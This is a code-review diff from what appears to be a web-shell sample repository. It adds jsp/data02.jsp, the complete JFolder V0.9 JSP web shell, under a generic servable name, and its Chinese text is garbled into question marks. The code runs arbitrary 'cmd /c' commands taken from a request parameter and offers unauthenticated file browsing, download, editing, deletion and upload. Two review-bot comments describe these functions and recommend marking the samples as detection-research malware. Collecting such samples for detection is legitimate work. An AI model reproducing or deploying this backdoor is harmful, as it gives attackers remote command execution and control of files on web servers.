</td>
</tr>
<form name="frmMake" action="" method="post">
<tr><td colspan=2 bgcolor=#FBFFC6>
<input type="hidden" name="action" value="newFile">
<input type="hidden" name="path" value="<%=strDir%>">
<input type="hidden" name="file" value="<%=strFile%>">
<input type="hidden" name="cmd" value="<%=strCmd%>">
<input type="hidden" name="tabID" value="1">
<input type="hidden" name="content" value="">
<%
if(!strDir.endsWith("\\"))
strDir = strDir + "\\";
%>
<input type="text" name="fileName" size=36 value="<%=strDir%>">
<input type="submit" name="btnNewFile" value="???¨????" onclick="frmMake.submit()" >
<input type="submit" name="btnNewDir" value="???¨????" onclick="frmMake.submit()" >
</form>
<form name="frmUpload" enctype="multipart/form-data" action="" method="post">
<input type="hidden" name="action" value="upload">
<input type="hidden" name="path" value="<%=strDir%>">
<input type="hidden" name="file" value="<%=strFile%>">
<input type="hidden" name="cmd" value="<%=strCmd%>">
<input type="hidden" name="tabID" value="1">
<input type="hidden" name="content" value="">
<input type="file" name="cqqUploadFile" size="36">
<input type="submit" name="submit" value="????">
</td></tr></form>
</table>
</div>
<div id="menu2" class="tabcontent">
<%
String line="";
StringBuffer sbCmd=new StringBuffer("");
if(strCmd!=null)
{
try
{
//out.println(strCmd);
Process p=Runtime.getRuntime().exec("cmd /c "+strCmd);
BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
while((line=br.readLine())!=null)
{
sbCmd.append(line+"\r\n");
}
}
catch(Exception e)
{
System.out.println(e.toString());
}
}
else
{
strCmd = "set";
}
%>
<form name="cmd" action="" method="post">
&nbsp;
<input type="text" name="cmd" value="<%=strCmd%>" size=50>
<input type="hidden" name="tabID" value="2">
<input type=submit name=submit value="<%=strExecute[languageNo]%>">
</form>
<%
if(sbCmd!=null && sbCmd.toString().trim().equals("")==false)
{
%>
&nbsp;<TEXTAREA NAME="cqq" ROWS="20" COLS="100%"><%=sbCmd.toString()%></TEXTAREA>
<br>&nbsp;
<%
}
%>
</DIV>
</div>
<br><br>
<center><a href="http://www.wooyun.org/" target="_blank">http://www.WooYun.org/</a> ,All Rights Reserved.
<br>Email:121208099#qq.com
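Review bot: The file is committed under the generic name `jsp/data.jsp` although its header comment and `strThisFile` identify it as `JFolder.jsp` (JFolder V0.9), and `jsp/data02.jsp` begins with the same lines; a generic name hides the family from anyone searching the collection. Record the family name in the path or in an index entry, together with strings that are constant in this sample, such as the form name `frmCqq`, the upload field `cqqUploadFile` and the `cqq_` prefix put on copied files, so detection content can be tied back to it. For triage, the entry should also state what the request-handling scriptlet does: the `action` values `down`, `del`, `edit`, `save`, `copy`, `savecopy` and `newFile`, a multipart upload path, and `Runtime.getRuntime().exec("cmd /c "+strCmd)`, all driven by request parameters with no access check visible in this section.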

993
jsp/data02.jsp Normal file

@ -0,0 +1,993 @@
<%
/**
JFolder V0.9 windows platform
@Filename?? JFolder.jsp
@Description?? ?????ò???????????????????????ò???à????×??????í?÷???á???ù±?????????×÷????????????????
@Bugs : ?????±??????????????·¨????????
*/
%>
<%@ page contentType="text/html;charset=gb2312"%>
<%@page import="java.io.*,java.util.*,java.net.*" %>
<%!
private final static int languageNo=0; //????°?±???0 : ?????? 1??????
String strThisFile="JFolder.jsp";
String[] authorInfo={" <font color=red> °??????ú </font>"," <font color=red> Thanks for your support - - by Steven Cee http://www.topronet.com </font>"};
String[] strFileManage = {"?? ?? ?? ?í","File Management"};
String[] strCommand = {"CMD ?ü ??","Command Window"};
String[] strSysProperty = {"?? ?? ?? ??","System Property"};
String[] strHelp = {"°? ?ú","Help"};
String[] strParentFolder = {"????????","Parent Folder"};
String[] strCurrentFolder= {"?±?°????","Current Folder"};
String[] strDrivers = {"?????÷","Drivers"};
String[] strFileName = {"????????","File Name"};
String[] strFileSize = {"?????ó??","File Size"};
String[] strLastModified = {"×??ó????","Last Modified"};
String[] strFileOperation= {"??????×÷","Operations"};
String[] strFileEdit = {"????","Edit"};
String[] strFileDown = {"????","Download"};
String[] strFileCopy = {"????","Move"};
String[] strFileDel = {"????","Delete"};
String[] strExecute = {"????","Execute"};
String[] strBack = {"·???","Back"};
String[] strFileSave = {"±???","Save"};
public class FileHandler
{
private String strAction="";
private String strFile="";
void FileHandler(String action,String f)
{
}
}
public static class UploadMonitor {
static Hashtable uploadTable = new Hashtable();
static void set(String fName, UplInfo info) {
uploadTable.put(fName, info);
}
static void remove(String fName) {
uploadTable.remove(fName);
}
static UplInfo getInfo(String fName) {
UplInfo info = (UplInfo) uploadTable.get(fName);
return info;
}
}
public class UplInfo {
public long totalSize;
public long currSize;
public long starttime;
public boolean aborted;
public UplInfo() {
totalSize = 0l;
currSize = 0l;
starttime = System.currentTimeMillis();
aborted = false;
}
public UplInfo(int size) {
totalSize = size;
currSize = 0;
starttime = System.currentTimeMillis();
aborted = false;
}
public String getUprate() {
long time = System.currentTimeMillis() - starttime;
if (time != 0) {
long uprate = currSize * 1000 / time;
return convertFileSize(uprate) + "/s";
}
else return "n/a";
}
public int getPercent() {
if (totalSize == 0) return 0;
else return (int) (currSize * 100 / totalSize);
}
public String getTimeElapsed() {
long time = (System.currentTimeMillis() - starttime) / 1000l;
if (time - 60l >= 0){
if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m";
else return time / 60 + ":0" + (time % 60) + "m";
}
else return time<10 ? "0" + time + "s": time + "s";
}
public String getTimeEstimated() {
if (currSize == 0) return "n/a";
long time = System.currentTimeMillis() - starttime;
time = totalSize * time / currSize;
time /= 1000l;
if (time - 60l >= 0){
if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m";
else return time / 60 + ":0" + (time % 60) + "m";
}
else return time<10 ? "0" + time + "s": time + "s";
}
}
public class FileInfo {
public String name = null, clientFileName = null, fileContentType = null;
private byte[] fileContents = null;
public File file = null;
public StringBuffer sb = new StringBuffer(100);
public void setFileContents(byte[] aByteArray) {
fileContents = new byte[aByteArray.length];
System.arraycopy(aByteArray, 0, fileContents, 0, aByteArray.length);
}
}
// A Class with methods used to process a ServletInputStream
public class HttpMultiPartParser {
private final String lineSeparator = System.getProperty("line.separator", "\n");
private final int ONE_MB = 1024 * 1;
public Hashtable processData(ServletInputStream is, String boundary, String saveInDir,
int clength) throws IllegalArgumentException, IOException {
if (is == null) throw new IllegalArgumentException("InputStream");
if (boundary == null || boundary.trim().length() < 1) throw new IllegalArgumentException(
"\"" + boundary + "\" is an illegal boundary indicator");
boundary = "--" + boundary;
StringTokenizer stLine = null, stFields = null;
FileInfo fileInfo = null;
Hashtable dataTable = new Hashtable(5);
String line = null, field = null, paramName = null;
boolean saveFiles = (saveInDir != null && saveInDir.trim().length() > 0);
boolean isFile = false;
if (saveFiles) { // Create the required directory (including parent dirs)
File f = new File(saveInDir);
f.mkdirs();
}
line = getLine(is);
if (line == null || !line.startsWith(boundary)) throw new IOException(
"Boundary not found; boundary = " + boundary + ", line = " + line);
while (line != null) {
if (line == null || !line.startsWith(boundary)) return dataTable;
line = getLine(is);
if (line == null) return dataTable;
stLine = new StringTokenizer(line, ";\r\n");
if (stLine.countTokens() < 2) throw new IllegalArgumentException(
"Bad data in second line");
line = stLine.nextToken().toLowerCase();
if (line.indexOf("form-data") < 0) throw new IllegalArgumentException(
"Bad data in second line");
stFields = new StringTokenizer(stLine.nextToken(), "=\"");
if (stFields.countTokens() < 2) throw new IllegalArgumentException(
"Bad data in second line");
fileInfo = new FileInfo();
stFields.nextToken();
paramName = stFields.nextToken();
isFile = false;
if (stLine.hasMoreTokens()) {
field = stLine.nextToken();
stFields = new StringTokenizer(field, "=\"");
if (stFields.countTokens() > 1) {
if (stFields.nextToken().trim().equalsIgnoreCase("filename")) {
fileInfo.name = paramName;
String value = stFields.nextToken();
if (value != null && value.trim().length() > 0) {
fileInfo.clientFileName = value;
isFile = true;
}
else {
line = getLine(is); // Skip "Content-Type:" line
line = getLine(is); // Skip blank line
line = getLine(is); // Skip blank line
line = getLine(is); // Position to boundary line
continue;
}
}
}
else if (field.toLowerCase().indexOf("filename") >= 0) {
line = getLine(is); // Skip "Content-Type:" line
line = getLine(is); // Skip blank line
line = getLine(is); // Skip blank line
line = getLine(is); // Position to boundary line
continue;
}
}
boolean skipBlankLine = true;
if (isFile) {
line = getLine(is);
if (line == null) return dataTable;
if (line.trim().length() < 1) skipBlankLine = false;
else {
stLine = new StringTokenizer(line, ": ");
if (stLine.countTokens() < 2) throw new IllegalArgumentException(
"Bad data in third line");
stLine.nextToken(); // Content-Type
fileInfo.fileContentType = stLine.nextToken();
}
}
if (skipBlankLine) {
line = getLine(is);
if (line == null) return dataTable;
}
if (!isFile) {
line = getLine(is);
if (line == null) return dataTable;
dataTable.put(paramName, line);
// If parameter is dir, change saveInDir to dir
if (paramName.equals("dir")) saveInDir = line;
line = getLine(is);
continue;
}
try {
UplInfo uplInfo = new UplInfo(clength);
UploadMonitor.set(fileInfo.clientFileName, uplInfo);
OutputStream os = null;
String path = null;
if (saveFiles) os = new FileOutputStream(path = getFileName(saveInDir,
fileInfo.clientFileName));
else os = new ByteArrayOutputStream(ONE_MB);
boolean readingContent = true;
byte previousLine[] = new byte[2 * ONE_MB];
byte temp[] = null;
byte currentLine[] = new byte[2 * ONE_MB];
int read, read3;
if ((read = is.readLine(previousLine, 0, previousLine.length)) == -1) {
line = null;
break;
}
while (readingContent) {
if ((read3 = is.readLine(currentLine, 0, currentLine.length)) == -1) {
line = null;
uplInfo.aborted = true;
break;
}
if (compareBoundary(boundary, currentLine)) {
os.write(previousLine, 0, read - 2);
line = new String(currentLine, 0, read3);
break;
}
else {
os.write(previousLine, 0, read);
uplInfo.currSize += read;
temp = currentLine;
currentLine = previousLine;
previousLine = temp;
read = read3;
}//end else
}//end while
os.flush();
os.close();
if (!saveFiles) {
ByteArrayOutputStream baos = (ByteArrayOutputStream) os;
fileInfo.setFileContents(baos.toByteArray());
}
else fileInfo.file = new File(path);
dataTable.put(paramName, fileInfo);
uplInfo.currSize = uplInfo.totalSize;
}//end try
catch (IOException e) {
throw e;
}
}
return dataTable;
}
/**
* Compares boundary string to byte array
*/
private boolean compareBoundary(String boundary, byte ba[]) {
byte b;
if (boundary == null || ba == null) return false;
for (int i = 0; i < boundary.length(); i++)
if ((byte) boundary.charAt(i) != ba[i]) return false;
return true;
}
/** Convenience method to read HTTP header lines */
private synchronized String getLine(ServletInputStream sis) throws IOException {
byte b[] = new byte[1024];
int read = sis.readLine(b, 0, b.length), index;
String line = null;
if (read != -1) {
line = new String(b, 0, read);
if ((index = line.indexOf('\n')) >= 0) line = line.substring(0, index - 1);
}
return line;
}
public String getFileName(String dir, String fileName) throws IllegalArgumentException {
String path = null;
if (dir == null || fileName == null) throw new IllegalArgumentException(
"dir or fileName is null");
int index = fileName.lastIndexOf('/');
String name = null;
if (index >= 0) name = fileName.substring(index + 1);
else name = fileName;
index = name.lastIndexOf('\\');
if (index >= 0) fileName = name.substring(index + 1);
path = dir + File.separator + fileName;
if (File.separatorChar == '/') return path.replace('\\', File.separatorChar);
else return path.replace('/', File.separatorChar);
}
} //End of class HttpMultiPartParser
String formatPath(String p)
{
StringBuffer sb=new StringBuffer();
for (int i = 0; i < p.length(); i++)
{
if(p.charAt(i)=='\\')
{
sb.append("\\\\");
}
else
{
sb.append(p.charAt(i));
}
}
return sb.toString();
}
/**
* Converts some important chars (int) to the corresponding html string
*/
static String conv2Html(int i) {
if (i == '&') return "&amp;";
else if (i == '<') return "&lt;";
else if (i == '>') return "&gt;";
else if (i == '"') return "&quot;";
else return "" + (char) i;
}
/**
* Converts a normal string to a html conform string
*/
static String htmlEncode(String st) {
StringBuffer buf = new StringBuffer();
for (int i = 0; i < st.length(); i++) {
buf.append(conv2Html(st.charAt(i)));
}
return buf.toString();
}
String getDrivers()
/**
Windows?????????????????ù????????
*/
{
StringBuffer sb=new StringBuffer(strDrivers[languageNo] + " : ");
File roots[]=File.listRoots();
for(int i=0;i<roots.length;i++)
{
sb.append(" <a href=\"javascript:doForm('','"+roots[i]+"\\','','','1','');\">");
sb.append(roots[i]+"</a>&nbsp;");
}
return sb.toString();
}
static String convertFileSize(long filesize)
{
//bug 5.09M ????5.9M
String strUnit="Bytes";
String strAfterComma="";
int intDivisor=1;
if(filesize>=1024*1024)
{
strUnit = "MB";
intDivisor=1024*1024;
}
else if(filesize>=1024)
{
strUnit = "KB";
intDivisor=1024;
}
if(intDivisor==1) return filesize + " " + strUnit;
strAfterComma = "" + 100 * (filesize % intDivisor) / intDivisor ;
if(strAfterComma=="") strAfterComma=".0";
return filesize / intDivisor + "." + strAfterComma + " " + strUnit;
}
%>
<%
request.setCharacterEncoding("gb2312");
String tabID = request.getParameter("tabID");
String strDir = request.getParameter("path");
String strAction = request.getParameter("action");
String strFile = request.getParameter("file");
String strPath = strDir + "\\" + strFile;
String strCmd = request.getParameter("cmd");
StringBuffer sbEdit=new StringBuffer("");
StringBuffer sbDown=new StringBuffer("");
StringBuffer sbCopy=new StringBuffer("");
StringBuffer sbSaveCopy=new StringBuffer("");
StringBuffer sbNewFile=new StringBuffer("");
if((tabID==null) || tabID.equals(""))
{
tabID = "1";
}
if(strDir==null||strDir.length()<1)
{
strDir = request.getRealPath("/");
}
if(strAction!=null && strAction.equals("down"))
{
File f=new File(strPath);
if(f.length()==0)
{
sbDown.append("?????ó???? 0 ×???????????????°?");
}
else
{
response.setHeader("content-type","text/html; charset=ISO-8859-1");
response.setContentType("APPLICATION/OCTET-STREAM");
response.setHeader("Content-Disposition","attachment; filename=\""+f.getName()+"\"");
FileInputStream fileInputStream =new FileInputStream(f.getAbsolutePath());
out.clearBuffer();
int i;
while ((i=fileInputStream.read()) != -1)
{
out.write(i);
}
fileInputStream.close();
out.close();
}
}
if(strAction!=null && strAction.equals("del"))
{
File f=new File(strPath);
f.delete();
}
if(strAction!=null && strAction.equals("edit"))
{
File f=new File(strPath);
BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(f)));
sbEdit.append("<form name='frmEdit' action='' method='POST'>\r\n");
sbEdit.append("<input type=hidden name=action value=save >\r\n");
sbEdit.append("<input type=hidden name=path value='"+strDir+"' >\r\n");
sbEdit.append("<input type=hidden name=file value='"+strFile+"' >\r\n");
sbEdit.append("<input type=submit name=save value=' "+strFileSave[languageNo]+" '> ");
sbEdit.append("<input type=button name=goback value=' "+strBack[languageNo]+" ' onclick='history.back(-1);'> &nbsp;"+strPath+"\r\n");
sbEdit.append("<br><textarea rows=30 cols=90 name=content>");
String line="";
while((line=br.readLine())!=null)
{
sbEdit.append(htmlEncode(line)+"\r\n");
}
sbEdit.append("</textarea>");
sbEdit.append("<input type=hidden name=path value="+strDir+">");
sbEdit.append("</form>");
}
if(strAction!=null && strAction.equals("save"))
{
File f=new File(strPath);
BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(f)));
String strContent=request.getParameter("content");
bw.write(strContent);
bw.close();
}
if(strAction!=null && strAction.equals("copy"))
{
File f=new File(strPath);
sbCopy.append("<br><form name='frmCopy' action='' method='POST'>\r\n");
sbCopy.append("<input type=hidden name=action value=savecopy >\r\n");
sbCopy.append("<input type=hidden name=path value='"+strDir+"' >\r\n");
sbCopy.append("<input type=hidden name=file value='"+strFile+"' >\r\n");
sbCopy.append("?????????? "+strPath+"<p>");
sbCopy.append("??±ê?????? <input type=text name=file2 size=40 value='"+strDir+"'><p>");
sbCopy.append("<input type=submit name=save value=' "+strFileCopy[languageNo]+" '> ");
sbCopy.append("<input type=button name=goback value=' "+strBack[languageNo]+" ' onclick='history.back(-1);'> <p>&nbsp;\r\n");
sbCopy.append("</form>");
}
if(strAction!=null && strAction.equals("savecopy"))
{
File f=new File(strPath);
String strDesFile=request.getParameter("file2");
if(strDesFile==null || strDesFile.equals(""))
{
sbSaveCopy.append("<p><font color=red>??±ê?????í?ó??</font>");
}
else
{
File f_des=new File(strDesFile);
if(f_des.isFile())
{
sbSaveCopy.append("<p><font color=red>??±ê??????????,??????????</font>");
}
else
{
String strTmpFile=strDesFile;
if(f_des.isDirectory())
{
if(!strDesFile.endsWith("\\"))
{
strDesFile=strDesFile+"\\";
}
strTmpFile=strDesFile+"cqq_"+strFile;
}
File f_des_copy=new File(strTmpFile);
FileInputStream in1=new FileInputStream(f);
FileOutputStream out1=new FileOutputStream(f_des_copy);
byte[] buffer=new byte[1024];
int c;
while((c=in1.read(buffer))!=-1)
{
out1.write(buffer,0,c);
}
in1.close();
out1.close();
sbSaveCopy.append("???????? ??"+strPath+"<p>");
sbSaveCopy.append("??±ê???? ??"+strTmpFile+"<p>");
sbSaveCopy.append("<font color=red>??????????</font>");
}
}
sbSaveCopy.append("<p><input type=button name=saveCopyBack onclick='history.back(-2);' value=·???>");
}
if(strAction!=null && strAction.equals("newFile"))
{
String strF=request.getParameter("fileName");
String strType1=request.getParameter("btnNewFile");
String strType2=request.getParameter("btnNewDir");
String strType="";
if(strType1==null)
{
strType="Dir";
}
else if(strType2==null)
{
strType="File";
}
if(!strType.equals("") && !(strF==null || strF.equals("")))
{
File f_new=new File(strF);
if(strType.equals("File") && !f_new.createNewFile())
sbNewFile.append(strF+" ???????¨?§°?");
if(strType.equals("Dir") && !f_new.mkdirs())
sbNewFile.append(strF+" ???????¨?§°?");
}
else
{
sbNewFile.append("<p><font color=red>?¨???????ò???????í??</font>");
}
}
if((request.getContentType()!= null) && (request.getContentType().toLowerCase().startsWith("multipart")))
{
String tempdir=".";
boolean error=false;
response.setContentType("text/html");
sbNewFile.append("<p><font color=red>?¨???????ò???????í??</font>");
HttpMultiPartParser parser = new HttpMultiPartParser();
int bstart = request.getContentType().lastIndexOf("oundary=");
String bound = request.getContentType().substring(bstart + 8);
int clength = request.getContentLength();
Hashtable ht = parser.processData(request.getInputStream(), bound, tempdir, clength);
if (ht.get("cqqUploadFile") != null)
{
FileInfo fi = (FileInfo) ht.get("cqqUploadFile");
File f1 = fi.file;
UplInfo info = UploadMonitor.getInfo(fi.clientFileName);
if (info != null && info.aborted)
{
f1.delete();
request.setAttribute("error", "Upload aborted");
}
else
{
String path = (String) ht.get("path");
if(path!=null && !path.endsWith("\\"))
path = path + "\\";
if (!f1.renameTo(new File(path + f1.getName())))
{
request.setAttribute("error", "Cannot upload file.");
error = true;
f1.delete();
}
}
}
}
%>
<html>
<head>
<style type="text/css">
td,select,input,body{font-size:9pt;}
A { TEXT-DECORATION: none }
#tablist{
padding: 5px 0;
margin-left: 0;
margin-bottom: 0;
margin-top: 0.1em;
font:9pt;
}
#tablist li{
list-style: none;
display: inline;
margin: 0;
}
#tablist li a{
padding: 3px 0.5em;
margin-left: 3px;
border: 1px solid ;
background: F6F6F6;
}
#tablist li a:link, #tablist li a:visited{
color: navy;
}
#tablist li a.current{
background: #EAEAFF;
}
#tabcontentcontainer{
width: 100%;
padding: 5px;
border: 1px solid black;
}
.tabcontent{
display:none;
}
</style>
<script type="text/javascript">
var initialtab=[<%=tabID%>, "menu<%=tabID%>"]
////////Stop editting////////////////
function cascadedstyle(el, cssproperty, csspropertyNS){
if (el.currentStyle)
return el.currentStyle[cssproperty]
else if (window.getComputedStyle){
var elstyle=window.getComputedStyle(el, "")
return elstyle.getPropertyValue(csspropertyNS)
}
}
var previoustab=""
function expandcontent(cid, aobject){
if (document.getElementById){
highlighttab(aobject)
if (previoustab!="")
document.getElementById(previoustab).style.display="none"
document.getElementById(cid).style.display="block"
previoustab=cid
if (aobject.blur)
aobject.blur()
return false
}
else
return true
}
function highlighttab(aobject){
if (typeof tabobjlinks=="undefined")
collecttablinks()
for (i=0; i<tabobjlinks.length; i++)
tabobjlinks[i].style.backgroundColor=initTabcolor
var themecolor=aobject.getAttribute("theme")? aobject.getAttribute("theme") : initTabpostcolor
aobject.style.backgroundColor=document.getElementById("tabcontentcontainer").style.backgroundColor=themecolor
}
function collecttablinks(){
var tabobj=document.getElementById("tablist")
tabobjlinks=tabobj.getElementsByTagName("A")
}
function do_onload(){
collecttablinks()
initTabcolor=cascadedstyle(tabobjlinks[1], "backgroundColor", "background-color")
initTabpostcolor=cascadedstyle(tabobjlinks[0], "backgroundColor", "background-color")
expandcontent(initialtab[1], tabobjlinks[initialtab[0]-1])
}
if (window.addEventListener)
window.addEventListener("load", do_onload, false)
else if (window.attachEvent)
window.attachEvent("onload", do_onload)
else if (document.getElementById)
window.onload=do_onload
</script>
<script language="javascript">
function doForm(action,path,file,cmd,tab,content)
{
document.frmCqq.action.value=action;
document.frmCqq.path.value=path;
document.frmCqq.file.value=file;
document.frmCqq.cmd.value=cmd;
document.frmCqq.tabID.value=tab;
document.frmCqq.content.value=content;
if(action=="del")
{
if(confirm("?·?¨?????????? "+file+" ????"))
document.frmCqq.submit();
}
else
{
document.frmCqq.submit();
}
}
</script>
<title>JSP Shell ·?°??????ú</title>
<head>
<body>
<form name="frmCqq" method="post" action="">
<input type="hidden" name="action" value="">
<input type="hidden" name="path" value="">
<input type="hidden" name="file" value="">
<input type="hidden" name="cmd" value="">
<input type="hidden" name="tabID" value="2">
<input type="hidden" name="content" value="">
</form>
<!--Top Menu Started-->
<ul id="tablist">
<li><a href="http://www.smallrain.net" class="current" onClick="return expandcontent('menu1', this)"> <%=strFileManage[languageNo]%> </a></li>
<li><a href="new.htm" onClick="return expandcontent('menu2', this)" theme="#EAEAFF"> <%=strCommand[languageNo]%> </a></li>
<li><a href="hot.htm" onClick="return expandcontent('menu3', this)" theme="#EAEAFF"> <%=strSysProperty[languageNo]%> </a></li>
<li><a href="search.htm" onClick="return expandcontent('menu4', this)" theme="#EAEAFF"> <%=strHelp[languageNo]%> </a></li>
&nbsp; <%=authorInfo[languageNo]%>
</ul>
<!--Top Menu End-->
<%
StringBuffer sbFolder=new StringBuffer("");
StringBuffer sbFile=new StringBuffer("");
try
{
File objFile = new File(strDir);
File list[] = objFile.listFiles();
if(objFile.getAbsolutePath().length()>3)
{
sbFolder.append("<tr><td >&nbsp;</td><td><a href=\"javascript:doForm('','"+formatPath(objFile.getParentFile().getAbsolutePath())+"','','"+strCmd+"','1','');\">");
sbFolder.append(strParentFolder[languageNo]+"</a><br>- - - - - - - - - - - </td></tr>\r\n ");
}
for(int i=0;i<list.length;i++)
{
if(list[i].isDirectory())
{
sbFolder.append("<tr><td >&nbsp;</td><td>");
sbFolder.append(" <a href=\"javascript:doForm('','"+formatPath(list[i].getAbsolutePath())+"','','"+strCmd+"','1','');\">");
sbFolder.append(list[i].getName()+"</a><br></td></tr> ");
}
else
{
String strLen="";
String strDT="";
long lFile=0;
lFile=list[i].length();
strLen = convertFileSize(lFile);
Date dt=new Date(list[i].lastModified());
strDT=dt.toLocaleString();
sbFile.append("<tr onmouseover=\"this.style.backgroundColor='#FBFFC6'\" onmouseout=\"this.style.backgroundColor='white'\"><td>");
sbFile.append(""+list[i].getName());
sbFile.append("</td><td>");
sbFile.append(""+strLen);
sbFile.append("</td><td>");
sbFile.append(""+strDT);
sbFile.append("</td><td>");
sbFile.append(" &nbsp;<a href=\"javascript:doForm('edit','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
sbFile.append(strFileEdit[languageNo]+"</a> ");
sbFile.append(" &nbsp;<a href=\"javascript:doForm('del','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
sbFile.append(strFileDel[languageNo]+"</a> ");
sbFile.append(" &nbsp;<a href=\"javascript:doForm('down','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
sbFile.append(strFileDown[languageNo]+"</a> ");
sbFile.append(" &nbsp;<a href=\"javascript:doForm('copy','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
sbFile.append(strFileCopy[languageNo]+"</a> ");
}
}
}
catch(Exception e)
{
out.println("<font color=red>??×÷?§°??? "+e.toString()+"</font>");
}
%>
<DIV id="tabcontentcontainer">
<div id="menu3" class="tabcontent">
<br>
<br> &nbsp;&nbsp; ???ê??
<br>
<br>&nbsp;
</div>
<div id="menu4" class="tabcontent">
<br>
<p>???????????÷</p>
<p>&nbsp;&nbsp;&nbsp; jsp °?±??????????í?÷???¨???????ò???????????í·????÷???????????????ú???????¨????????</p>
<p>??????????????????????????windows?????????á?????ü?????°?????????????????????????ò???à??</p>
<p>??windows??cmd??</p>
<p>&nbsp;</p>
<p>????????</p>
<p>&nbsp;&nbsp;&nbsp;<b>???ó?????????????????????????????????ò???¨?é??????????????????±??????????ò?ü???ê???????¨??<p>
???????·????<a href="http://bbs.syue.com/" target="_blank">http://bbs.syue.com/</a></b>
<p>&nbsp;</p>
<p>?????ü??????</p>
<p>&nbsp;&nbsp;&nbsp; 2004.11.15&nbsp; V0.9????°?·????????????????ù±?????????????±à?????????????????????????????°???¨????????????</p>
<p>&nbsp;&nbsp;&nbsp; 2004.10.27&nbsp; ???±?¨??0.6°?°??? ?á???????????????????? ?? cmd????</p>
<p>&nbsp;&nbsp;&nbsp; 2004.09.20&nbsp; ??????jsp&nbsp;???ò?????????ò???????????????????????ò</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
</div>
<div id="menu1" class="tabcontent">
<%
out.println("<table border='1' width='100%' bgcolor='#FBFFC6' cellspacing=0 cellpadding=5 bordercolorlight=#000000 bordercolordark=#FFFFFF><tr><td width='30%'>"+strCurrentFolder[languageNo]+"?? <b>"+strDir+"</b></td><td>" + getDrivers() + "</td></tr></table><br>\r\n");
%>
<table width="100%" border="1" cellspacing="0" cellpadding="5" bordercolorlight="#000000" bordercolordark="#FFFFFF">
<tr>
<td width="25%" align="center" valign="top">
<table width="98%" border="0" cellspacing="0" cellpadding="3">
<%=sbFolder%>
</tr>
</table>
</td>
<td width="81%" align="left" valign="top">
<%
if(strAction!=null && strAction.equals("edit"))
{
out.println(sbEdit.toString());
}
else if(strAction!=null && strAction.equals("copy"))
{
out.println(sbCopy.toString());
}
else if(strAction!=null && strAction.equals("down"))
{
out.println(sbDown.toString());
}
else if(strAction!=null && strAction.equals("savecopy"))
{
out.println(sbSaveCopy.toString());
}
else if(strAction!=null && strAction.equals("newFile") && !sbNewFile.toString().equals(""))
{
out.println(sbNewFile.toString());
}
else
{
%>
<span id="EditBox"><table width="98%" border="1" cellspacing="1" cellpadding="4" bordercolorlight="#cccccc" bordercolordark="#FFFFFF" bgcolor="white" >
<tr bgcolor="#E7e7e6">
<td width="26%"><%=strFileName[languageNo]%></td>
<td width="19%"><%=strFileSize[languageNo]%></td>
<td width="29%"><%=strLastModified[languageNo]%></td>
<td width="26%"><%=strFileOperation[languageNo]%></td>
</tr>
<%=sbFile%>
<!-- <tr align="center">
<td colspan="4"><br>
×?????????????<font color="#FF0000">30</font> ???ó????<font color="#FF0000">664.9</font>
KB </td>
</tr>
-->
</table>
</span>
<%
}
%>
</td>
</tr>
<form name="frmMake" action="" method="post">
<tr><td colspan=2 bgcolor=#FBFFC6>
<input type="hidden" name="action" value="newFile">
<input type="hidden" name="path" value="<%=strDir%>">
<input type="hidden" name="file" value="<%=strFile%>">
<input type="hidden" name="cmd" value="<%=strCmd%>">
<input type="hidden" name="tabID" value="1">
<input type="hidden" name="content" value="">
<%
if(!strDir.endsWith("\\"))
strDir = strDir + "\\";
%>
<input type="text" name="fileName" size=36 value="<%=strDir%>">
<input type="submit" name="btnNewFile" value="???¨????" onclick="frmMake.submit()" >
<input type="submit" name="btnNewDir" value="???¨????" onclick="frmMake.submit()" >
</form>
<form name="frmUpload" enctype="multipart/form-data" action="" method="post">
<input type="hidden" name="action" value="upload">
<input type="hidden" name="path" value="<%=strDir%>">
<input type="hidden" name="file" value="<%=strFile%>">
<input type="hidden" name="cmd" value="<%=strCmd%>">
<input type="hidden" name="tabID" value="1">
<input type="hidden" name="content" value="">
<input type="file" name="cqqUploadFile" size="36">
<input type="submit" name="submit" value="????">
</td></tr></form>
</table>
</div>
<div id="menu2" class="tabcontent">
<%
String line="";
StringBuffer sbCmd=new StringBuffer("");
if(strCmd!=null)
{
try
{
//out.println(strCmd);
Process p=Runtime.getRuntime().exec("cmd /c "+strCmd);
BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
while((line=br.readLine())!=null)
{
sbCmd.append(line+"\r\n");
}
}
catch(Exception e)
{
System.out.println(e.toString());
}
}
else
{
strCmd = "set";
}
%>
<form name="cmd" action="" method="post">
&nbsp;
<input type="text" name="cmd" value="<%=strCmd%>" size=50>
<input type="hidden" name="tabID" value="2">
<input type=submit name=submit value="<%=strExecute[languageNo]%>">
</form>
<%
if(sbCmd!=null && sbCmd.toString().trim().equals("")==false)
{
%>
&nbsp;<TEXTAREA NAME="cqq" ROWS="20" COLS="100%"><%=sbCmd.toString()%></TEXTAREA>
<br>&nbsp;
<%
}
%>
</DIV>
</div>
<br><br>
<center><a href="http://www.wooyun.org/" target="_blank">http://www.WooYun.org/</a> ,All Rights Reserved.
<br>Email:121208099#qq.com
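Review bot: Nothing in jsp/data02.jsp marks it as a malware sample, and it is committed under a servable `.jsp` name: the `menu2` scriptlet passes the `cmd` request parameter to `Runtime.getRuntime().exec("cmd /c "+strCmd)`, and the `down`, `del`, `save`, `savecopy`, `newFile` and upload branches act on request-supplied `path`/`file` values, with no authentication check anywhere in the section. A checkout of this repository under a servlet container's document root would therefore expose it as-is; the same applies to jsp/guige02.jsp, jsp/web02.jsp and php/php-sh/server.php in this commit. I would open each sample with a comment such as `<%-- MALWARE SAMPLE (JFolder web shell), kept for detection research; do not deploy or place under a web root --%>` and store the files under a non-executable extension. The visible tail of the preceding file is line-for-line the same as the end of this one, so the two may be duplicates worth collapsing by hash. The GB2312 strings show up as runs of `?`, which suggests the bytes were transcoded before commit; if so, the file's hash will not match the sample as found in the wild.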

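--- a/jsp/guige02.jsp
+++ b/jsp/guige02.jsp
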